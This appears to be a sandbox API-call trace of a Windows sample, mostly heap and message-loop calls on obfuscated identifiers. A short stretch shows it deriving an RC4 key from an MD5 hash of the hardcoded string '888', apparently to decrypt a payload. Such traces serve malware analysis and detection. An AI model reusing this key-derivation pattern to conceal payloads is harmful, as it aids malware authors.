[0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.934] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.934] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.935] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0205.935] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0205.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0205.935] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.935] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0205.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0205.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.935] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.935] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0205.935] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.935] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0205.935] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0205.935] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0205.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0205.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0205.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fe0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0205.936] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c4c8) returned 1 [0205.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.937] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.937] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0205.937] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.937] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0205.937] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.937] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.937] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.937] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.937] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.937] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.937] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0205.937] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.937] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0205.937] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.937] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.937] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.937] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.937] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.937] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.938] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.938] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0205.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.938] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0205.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.938] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.939] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0205.939] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.939] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0205.939] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.939] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.939] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.939] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.939] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.939] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0205.939] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.939] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0205.939] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.939] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.940] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.940] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.940] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0205.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.940] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0205.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.940] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.940] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0205.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaae28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0205.940] CryptCreateHash (in: hProv=0xa7c4c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0205.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.940] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72778, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.941] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0205.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.941] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.941] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.941] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.941] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.941] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.941] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0205.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaae10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0205.941] CryptHashData (hHash=0x9e2078, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0205.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.941] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.941] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.941] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.941] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.941] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.941] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0205.942] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.942] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0205.942] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.942] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaaed0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0205.942] CryptDeriveKey (in: hProv=0xa7c4c8, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1db8) returned 1 [0205.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.942] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.942] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.942] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0205.942] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.942] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0205.942] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0205.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0205.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fa0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0205.943] CryptDestroyHash (hHash=0x9e2078) returned 1 [0205.943] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.943] 